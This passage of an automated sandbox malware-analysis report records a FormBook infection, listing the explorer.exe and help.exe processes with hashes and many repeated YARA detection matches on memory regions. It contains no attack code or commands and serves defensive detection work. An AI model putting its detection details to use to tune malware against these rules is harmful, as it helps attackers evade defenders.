                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:4
                                                Start time:01:24:13
                                                Start date:30/11/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff618f60000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:5
                                                Start time:01:24:44
                                                Start date:30/11/2022
                                                Path:C:\Windows\SysWOW64\help.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\help.exe
                                                Imagebase:0x110000
                                                File size:10240 bytes
                                                MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                No disassembly